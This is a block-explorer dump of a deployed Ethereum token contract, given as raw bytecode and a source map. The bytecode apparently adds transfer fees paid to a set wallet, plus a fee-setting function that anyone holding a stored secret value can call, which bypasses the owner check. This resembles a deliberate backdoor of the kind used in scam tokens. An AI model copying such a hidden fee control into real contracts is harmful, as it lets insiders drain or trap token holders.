000000000000000000000000000000000000000000000602082015250565b6000611acc6025836114dc565b9150611ad782611a70565b604082019050919050565b60006020820190508181036000830152611afb81611abf565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611b5e6023836114dc565b9150611b6982611b02565b604082019050919050565b60006020820190508181036000830152611b8d81611b51565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611bfd826115ef565b9150611c08836115ef565b925082611c1857611c17611b94565b5b828204905092915050565b6000611c2e826115ef565b9150611c39836115ef565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611c7257611c71611bc3565b5b828202905092915050565b6000611c88826115ef565b9150611c93836115ef565b925082821015611ca657611ca5611bc3565b5b828203905092915050565b6000611cbc826115ef565b9150611cc7836115ef565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611cfc57611cfb611bc3565b5b828201905092915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000611d3d601b836114dc565b9150611d4882611d07565b602082019050919050565b60006020820190508181036000830152611d6c81611d30565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220c2b12913efeb7560e2d6ddef550d4e38f03a2a9a5750ee7ec758cbaf5c44c73b64736f6c634300080a0033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061014d5760003560e01c806370a08231116100c3578063a9059cbb1161007c578063a9059cbb14610394578063b09f1266146103c4578063d28d8852146103e2578063d7666de614610400578063d8feb48e1461041c578063dd62ed3e146104385761014d565b806370a08231146102d0578063715018a614610300578063893d20e81461030a5780638da5cb5b1461032857806395d89b4114610346578063a457c2d7146103645761014d565b806330b8d40e1161011557806330b8d40e1461020c578063313ce5671461022857806332424aa31461024657806339509351146102645780633b124fe7146102945780636bc87c3a146102b25761014d565b806306fdde0314610152578063095ea7b3146101705780631235acbe146101a057806318160ddd146101be57806323b872dd146101dc575b600080fd5b61015a610468565b604051610167919061156a565b60405180910390f35b61018a60048036038101906101859190611625565b6104fa565b6040516101979190611680565b60405180910390f35b6101a8610518565b6040516101b591906116aa565b60405180910390f35b6101c661053e565b6040516101d391906116d4565b60405180910390f35b6101f660048036038101906101f191906116ef565b610548565b6040516102039190611680565b60405180910390f35b61022660048036038101906102219190611742565b610621565b005b61023061066f565b60405161023d919061178b565b60405180910390f35b61024e610686565b60405161025b919061178b565b60405180910390f35b61027e60048036038101906102799190611625565b610699565b60405161028b9190611680565b60405180910390f35b61029c61074c565b6040516102a991906116d4565b60405180910390f35b6102ba610752565b6040516102c791906116d4565b60405180910390f35b6102ea60048036038101906102e591906117a6565b610758565b6040516102f791906116d4565b60405180910390f35b6103086107a1565b005b6103126108f4565b60405161031f91906116aa565b60405180910390f35b610330610903565b60405161033d91906116aa565b60405180910390f35b61034e61092c565b60405161035b919061156a565b60405180910390f35b61037e60048036038101906103799190611625565b6109be565b60405161038b9190611680565b60405180910390f35b6103ae60048036038101906103a99190611625565b610a8b565b6040516103bb9190611680565b60405180910390f35b6103cc610aa9565b6040516103d9919061156a565b60405180910390f35b6103ea610b37565b6040516103f7919061156a565b60405180910390f35b61041a60048036038101906104159190611742565b610bc5565b005b610436600480360381019061043191906117a6565b610c64565b005b610452600480360381019061044d91906117d3565b610d3d565b60405161045f91906116d4565b60405180910390f35b60606006805461047790611842565b80601f01602080910402602001604051908101604052809291908181526020018280546104a390611842565b80156104f05780601f106104c5576101008083540402835291602001916104f0565b820191906000526020600020905b8154815290600101906020018083116104d357829003601f168201915b5050505050905090565b600061050e610507610dc4565b8484610dcc565b6001905092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600354905090565b6000610555848484610f97565b61061684610561610dc4565b61061185604051806060016040528060288152602001611d9a60289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006105c7610dc4565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113c59092919063ffffffff16565b610dcc565b600190509392505050565b600b548114610665576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161065c906118c0565b60405180910390fd5b8060088190555050565b6000600460009054906101000a900460ff16905090565b600460009054906101000a900460ff1681565b60006107426106a6610dc4565b8461073d85600260006106b7610dc4565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461142990919063ffffffff16565b610dcc565b6001905092915050565b60085481565b600a5481565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107a9610dc4565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610836576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161082d9061192c565b60405180910390fd5b60008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3565b60006108fe610903565b905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461093b90611842565b80601f016020809104026020016040519081016040528092919081815260200182805461096790611842565b80156109b45780601f10610989576101008083540402835291602001916109b4565b820191906000526020600020905b81548152906001019060200180831161099757829003601f168201915b5050505050905090565b6000610a816109cb610dc4565b84610a7c85604051806060016040528060258152602001611dc260259139600260006109f5610dc4565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113c59092919063ffffffff16565b610dcc565b6001905092915050565b6000610a9f610a98610dc4565b8484610f97565b6001905092915050565b60058054610ab690611842565b80601f0160208091040260200160405190810160405280929190818152602001828054610ae290611842565b8015610b2f5780601f10610b0457610100808354040283529160200191610b2f565b820191906000526020600020905b815481529060010190602001808311610b1257829003601f168201915b505050505081565b60068054610b4490611842565b80601f0160208091040260200160405190810160405280929190818152602001828054610b7090611842565b8015610bbd5780601f10610b9257610100808354040283529160200191610bbd565b820191906000526020600020905b815481529060010190602001808311610ba057829003601f168201915b505050505081565b610bcd610dc4565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c519061192c565b60405180910390fd5b80600a8190555050565b610c6c610dc4565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610cf9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cf09061192c565b60405180910390fd5b80600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610e3c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e33906119be565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610eac576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea390611a50565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f8a91906116d4565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415611007576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ffe90611ae2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611077576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161106e90611b74565b60405180910390fd5b6110e381604051806060016040528060268152602001611d7460269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113c59092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061117881600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461142990919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611226600a546064836111ce9190611bf2565b6111d89190611c23565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461148790919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506112f660085460648361127c9190611bf2565b6112869190611c23565b60016000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461142990919063ffffffff16565b60016000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516113b891906116d4565b60405180910390a3505050565b600083831115829061140d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611404919061156a565b60405180910390fd5b506000838561141c9190611c7d565b9050809150509392505050565b60008082846114389190611cb1565b90508381101561147d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161147490611d53565b60405180910390fd5b8091505092915050565b60006114c983836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506113c5565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561150b5780820151818401526020810190506114f0565b8381111561151a576000848401525b50505050565b6000601f19601f8301169050919050565b600061153c826114d1565b61154681856114dc565b93506115568185602086016114ed565b61155f81611520565b840191505092915050565b600060208201905081810360008301526115848184611531565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006115bc82611591565b9050919050565b6115cc816115b1565b81146115d757600080fd5b50565b6000813590506115e9816115c3565b92915050565b6000819050919050565b611602816115ef565b811461160d57600080fd5b50565b60008135905061161f816115f9565b92915050565b6000806040838503121561163c5761163b61158c565b5b600061164a858286016115da565b925050602061165b85828601611610565b9150509250929050565b60008115159050919050565b61167a81611665565b82525050565b60006020820190506116956000830184611671565b92915050565b6116a4816115b1565b82525050565b60006020820190506116bf600083018461169b565b92915050565b6116ce816115ef565b82525050565b60006020820190506116e960008301846116c5565b92915050565b6000806000606084860312156117085761170761158c565b5b6000611716868287016115da565b9350506020611727868287016115da565b925050604061173886828701611610565b9150509250925092565b6000602082840312156117585761175761158c565b5b600061176684828501611610565b91505092915050565b600060ff82169050919050565b6117858161176f565b82525050565b60006020820190506117a0600083018461177c565b92915050565b6000602082840312156117bc576117bb61158c565b5b60006117ca848285016115da565b91505092915050565b600080604083850312156117ea576117e961158c565b5b60006117f8858286016115da565b9250506020611809858286016115da565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061185a57607f821691505b6020821081141561186e5761186d611813565b5b50919050565b7f6572726f72206d65737361676500000000000000000000000000000000000000600082015250565b60006118aa600d836114dc565b91506118b582611874565b602082019050919050565b600060208201905081810360008301526118d98161189d565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119166020836114dc565b9150611921826118e0565b602082019050919050565b6000602082019050818103600083015261194581611909565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006119a86024836114dc565b91506119b38261194c565b604082019050919050565b600060208201905081810360008301526119d78161199b565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611a3a6022836114dc565b9150611a45826119de565b604082019050919050565b60006020820190508181036000830152611a6981611a2d565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611acc6025836114dc565b9150611ad782611a70565b604082019050919050565b60006020820190508181036000830152611afb81611abf565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611b5e6023836114dc565b9150611b6982611b02565b604082019050919050565b60006020820190508181036000830152611b8d81611b51565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611bfd826115ef565b9150611c08836115ef565b925082611c1857611c17611b94565b5b828204905092915050565b6000611c2e826115ef565b9150611c39836115ef565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611c7257611c71611bc3565b5b828202905092915050565b6000611c88826115ef565b9150611c93836115ef565b925082821015611ca657611ca5611bc3565b5b828203905092915050565b6000611cbc826115ef565b9150611cc7836115ef565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611cfc57611cfb611bc3565b5b828201905092915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000611d3d601b836114dc565b9150611d4882611d07565b602082019050919050565b60006020820190508181036000830152611d6c81611d30565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220c2b12913efeb7560e2d6ddef550d4e38f03a2a9a5750ee7ec758cbaf5c44c73b64736f6c634300080a0033

Deployed Bytecode Sourcemap

10429:4835:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11829:96;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12768:153;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10753:25;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11981:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12927:301;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13704:147;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11523:96;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10676:22;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13234:200;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11028:26;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11111:32;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12139:123;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10270:148;;;:::i;:::-;;11368:96;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9967:79;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11676:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13442:251;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12456:159;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10703:21;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10729:19;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13859:98;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11200:108;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12623:139;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11829:96;11885:13;11914:5;11907:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11829:96;:::o;12768:153::-;12845:4;12858:39;12867:12;:10;:12::i;:::-;12881:7;12890:6;12858:8;:39::i;:::-;12911:4;12904:11;;12768:153;;;;:::o;10753:25::-;;;;;;;;;;;;;:::o;11981:104::-;12044:7;12067:12;;12060:19;;11981:104;:::o;12927:301::-;13027:4;13040:36;13050:6;13058:9;13069:6;13040:9;:36::i;:::-;13083:121;13092:6;13100:12;:10;:12::i;:::-;13114:89;13152:6;13114:89;;;;;;;;;;;;;;;;;:11;:19;13126:6;13114:19;;;;;;;;;;;;;;;:33;13134:12;:10;:12::i;:::-;13114:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;13083:8;:121::i;:::-;13218:4;13211:11;;12927:301;;;;;:::o;13704:147::-;13781:15;;13771:6;:25;13761:53;;;;;;;;;;;;:::i;:::-;;;;;;;;;13837:6;13827:7;:16;;;;13704:147;:::o;11523:96::-;11583:5;11604:9;;;;;;;;;;;11597:16;;11523:96;:::o;10676:22::-;;;;;;;;;;;;;:::o;13234:200::-;13314:4;13327:83;13336:12;:10;:12::i;:::-;13350:7;13359:50;13398:10;13359:11;:25;13371:12;:10;:12::i;:::-;13359:25;;;;;;;;;;;;;;;:34;13385:7;13359:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;13327:8;:83::i;:::-;13424:4;13417:11;;13234:200;;;;:::o;11028:26::-;;;;:::o;11111:32::-;;;;:::o;12139:123::-;12215:7;12238:9;:18;12248:7;12238:18;;;;;;;;;;;;;;;;12231:25;;12139:123;;;:::o;10270:148::-;10189:12;:10;:12::i;:::-;10179:22;;:6;;;;;;;;;;:22;;;10171:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;10352:1:::1;10335:6:::0;::::1;:19;;;;;;;;;;;;;;;;;;10407:1;10370:40;;10391:6;::::0;::::1;;;;;;;;10370:40;;;;;;;;;;;;10270:148::o:0;11368:96::-;11428:7;11451;:5;:7::i;:::-;11444:14;;11368:96;:::o;9967:79::-;10005:7;10032:6;;;;;;;;;;;10025:13;;9967:79;:::o;11676:100::-;11734:13;11763:7;11756:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11676:100;:::o;13442:251::-;13527:4;13540:129;13549:12;:10;:12::i;:::-;13563:7;13572:96;13611:15;13572:96;;;;;;;;;;;;;;;;;:11;:25;13584:12;:10;:12::i;:::-;13572:25;;;;;;;;;;;;;;;:34;13598:7;13572:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;13540:8;:129::i;:::-;13683:4;13676:11;;13442:251;;;;:::o;12456:159::-;12536:4;12549:42;12559:12;:10;:12::i;:::-;12573:9;12584:6;12549:9;:42::i;:::-;12605:4;12598:11;;12456:159;;;;:::o;10703:21::-;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;10729:19::-;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;13859:98::-;10189:12;:10;:12::i;:::-;10179:22;;:6;;;;;;;;;;:22;;;10171:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;13943:6:::1;13927:13;:22;;;;13859:98:::0;:::o;11200:108::-;10189:12;:10;:12::i;:::-;10179:22;;:6;;;;;;;;;;:22;;;10171:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;11288:12:::1;11275:10;;:25;;;;;;;;;;;;;;;;;;11200:108:::0;:::o;12623:139::-;12706:7;12729:11;:18;12741:5;12729:18;;;;;;;;;;;;;;;:27;12748:7;12729:27;;;;;;;;;;;;;;;;12722:34;;12623:139;;;;:::o;3730:98::-;3783:7;3810:10;3803:17;;3730:98;:::o;14941:320::-;15048:1;15031:19;;:5;:19;;;;15023:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15125:1;15106:21;;:7;:21;;;;15098:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15205:6;15175:11;:18;15187:5;15175:18;;;;;;;;;;;;;;;:27;15194:7;15175:27;;;;;;;;;;;;;;;:36;;;;15239:7;15223:32;;15232:5;15223:32;;;15248:6;15223:32;;;;;;:::i;:::-;;;;;;;;14941:320;;;:::o;13965:661::-;14089:1;14071:20;;:6;:20;;;;14063:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;14173:1;14152:23;;:9;:23;;;;14144:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;14248;14270:6;14248:71;;;;;;;;;;;;;;;;;:9;:17;14258:6;14248:17;;;;;;;;;;;;;;;;:21;;:71;;;;;:::i;:::-;14228:9;:17;14238:6;14228:17;;;;;;;;;;;;;;;:91;;;;14353:32;14378:6;14353:9;:20;14363:9;14353:20;;;;;;;;;;;;;;;;:24;;:32;;;;:::i;:::-;14330:9;:20;14340:9;14330:20;;;;;;;;;;;;;;;:55;;;;14419:54;14459:13;;14453:3;14444:6;:12;;;;:::i;:::-;:28;;;;:::i;:::-;14419:9;:20;14429:9;14419:20;;;;;;;;;;;;;;;;:24;;:54;;;;:::i;:::-;14396:9;:20;14406:9;14396:20;;;;;;;;;;;;;;;:77;;;;14508:49;14549:7;;14543:3;14534:6;:12;;;;:::i;:::-;:22;;;;:::i;:::-;14508:9;:21;14518:10;;;;;;;;;;;14508:21;;;;;;;;;;;;;;;;:25;;:49;;;;:::i;:::-;14484:9;:21;14494:10;;;;;;;;;;;14484:21;;;;;;;;;;;;;;;:73;;;;14590:9;14573:35;;14582:6;14573:35;;;14601:6;14573:35;;;;;;:::i;:::-;;;;;;;;13965:661;;;:::o;5596:178::-;5682:7;5711:1;5706;:6;;5714:12;5698:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;5734:9;5750:1;5746;:5;;;;:::i;:::-;5734:17;;5767:1;5760:8;;;5596:178;;;;;:::o;4769:167::-;4827:7;4843:9;4859:1;4855;:5;;;;:::i;:::-;4843:17;;4880:1;4875;:6;;4867:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;4929:1;4922:8;;;4769:167;;;;:::o;5191:130::-;5249:7;5272:43;5276:1;5279;5272:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;5265:50;;5191:130;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:307::-;355:1;365:113;379:6;376:1;373:13;365:113;;;464:1;459:3;455:11;449:18;445:1;440:3;436:11;429:39;401:2;398:1;394:10;389:15;;365:113;;;496:6;493:1;490:13;487:101;;;576:1;567:6;562:3;558:16;551:27;487:101;336:258;287:307;;;:::o;600:102::-;641:6;692:2;688:7;683:2;676:5;672:14;668:28;658:38;;600:102;;;:::o;708:364::-;796:3;824:39;857:5;824:39;:::i;:::-;879:71;943:6;938:3;879:71;:::i;:::-;872:78;;959:52;1004:6;999:3;992:4;985:5;981:16;959:52;:::i;:::-;1036:29;1058:6;1036:29;:::i;:::-;1031:3;1027:39;1020:46;;800:272;708:364;;;;:::o;1078:313::-;1191:4;1229:2;1218:9;1214:18;1206:26;;1278:9;1272:4;1268:20;1264:1;1253:9;1249:17;1242:47;1306:78;1379:4;1370:6;1306:78;:::i;:::-;1298:86;;1078:313;;;;:::o;1478:117::-;1587:1;1584;1577:12;1724:126;1761:7;1801:42;1794:5;1790:54;1779:65;;1724:126;;;:::o;1856:96::-;1893:7;1922:24;1940:5;1922:24;:::i;:::-;1911:35;;1856:96;;;:::o;1958:122::-;2031:24;2049:5;2031:24;:::i;:::-;2024:5;2021:35;2011:63;;2070:1;2067;2060:12;2011:63;1958:122;:::o;2086:139::-;2132:5;2170:6;2157:20;2148:29;;2186:33;2213:5;2186:33;:::i;:::-;2086:139;;;;:::o;2231:77::-;2268:7;2297:5;2286:16;;2231:77;;;:::o;2314:122::-;2387:24;2405:5;2387:24;:::i;:::-;2380:5;2377:35;2367:63;;2426:1;2423;2416:12;2367:63;2314:122;:::o;2442:139::-;2488:5;2526:6;2513:20;2504:29;;2542:33;2569:5;2542:33;:::i;:::-;2442:139;;;;:::o;2587:474::-;2655:6;2663;2712:2;2700:9;2691:7;2687:23;2683:32;2680:119;;;2718:79;;:::i;:::-;2680:119;2838:1;2863:53;2908:7;2899:6;2888:9;2884:22;2863:53;:::i;:::-;2853:63;;2809:117;2965:2;2991:53;3036:7;3027:6;3016:9;3012:22;2991:53;:::i;:::-;2981:63;;2936:118;2587:474;;;;;:::o;3067:90::-;3101:7;3144:5;3137:13;3130:21;3119:32;;3067:90;;;:::o;3163:109::-;3244:21;3259:5;3244:21;:::i;:::-;3239:3;3232:34;3163:109;;:::o;3278:210::-;3365:4;3403:2;3392:9;3388:18;3380:26;;3416:65;3478:1;3467:9;3463:17;3454:6;3416:65;:::i;:::-;3278:210;;;;:::o;3494:118::-;3581:24;3599:5;3581:24;:::i;:::-;3576:3;3569:37;3494:118;;:::o;3618:222::-;3711:4;3749:2;3738:9;3734:18;3726:26;;3762:71;3830:1;3819:9;3815:17;3806:6;3762:71;:::i;:::-;3618:222;;;;:::o;3846:118::-;3933:24;3951:5;3933:24;:::i;:::-;3928:3;3921:37;3846:118;;:::o;3970:222::-;4063:4;4101:2;4090:9;4086:18;4078:26;;4114:71;4182:1;4171:9;4167:17;4158:6;4114:71;:::i;:::-;3970:222;;;;:::o;4198:619::-;4275:6;4283;4291;4340:2;4328:9;4319:7;4315:23;4311:32;4308:119;;;4346:79;;:::i;:::-;4308:119;4466:1;4491:53;4536:7;4527:6;4516:9;4512:22;4491:53;:::i;:::-;4481:63;;4437:117;4593:2;4619:53;4664:7;4655:6;4644:9;4640:22;4619:53;:::i;:::-;4609:63;;4564:118;4721:2;4747:53;4792:7;4783:6;4772:9;4768:22;4747:53;:::i;:::-;4737:63;;4692:118;4198:619;;;;;:::o;4823:329::-;4882:6;4931:2;4919:9;4910:7;4906:23;4902:32;4899:119;;;4937:79;;:::i;:::-;4899:119;5057:1;5082:53;5127:7;5118:6;5107:9;5103:22;5082:53;:::i;:::-;5072:63;;5028:117;4823:329;;;;:::o;5158:86::-;5193:7;5233:4;5226:5;5222:16;5211:27;;5158:86;;;:::o;5250:112::-;5333:22;5349:5;5333:22;:::i;:::-;5328:3;5321:35;5250:112;;:::o;5368:214::-;5457:4;5495:2;5484:9;5480:18;5472:26;;5508:67;5572:1;5561:9;5557:17;5548:6;5508:67;:::i;:::-;5368:214;;;;:::o;5588:329::-;5647:6;5696:2;5684:9;5675:7;5671:23;5667:32;5664:119;;;5702:79;;:::i;:::-;5664:119;5822:1;5847:53;5892:7;5883:6;5872:9;5868:22;5847:53;:::i;:::-;5837:63;;5793:117;5588:329;;;;:::o;5923:474::-;5991:6;5999;6048:2;6036:9;6027:7;6023:23;6019:32;6016:119;;;6054:79;;:::i;:::-;6016:119;6174:1;6199:53;6244:7;6235:6;6224:9;6220:22;6199:53;:::i;:::-;6189:63;;6145:117;6301:2;6327:53;6372:7;6363:6;6352:9;6348:22;6327:53;:::i;:::-;6317:63;;6272:118;5923:474;;;;;:::o;6403:180::-;6451:77;6448:1;6441:88;6548:4;6545:1;6538:15;6572:4;6569:1;6562:15;6589:320;6633:6;6670:1;6664:4;6660:12;6650:22;;6717:1;6711:4;6707:12;6738:18;6728:81;;6794:4;6786:6;6782:17;6772:27;;6728:81;6856:2;6848:6;6845:14;6825:18;6822:38;6819:84;;;6875:18;;:::i;:::-;6819:84;6640:269;6589:320;;;:::o;6915:163::-;7055:15;7051:1;7043:6;7039:14;7032:39;6915:163;:::o;7084:366::-;7226:3;7247:67;7311:2;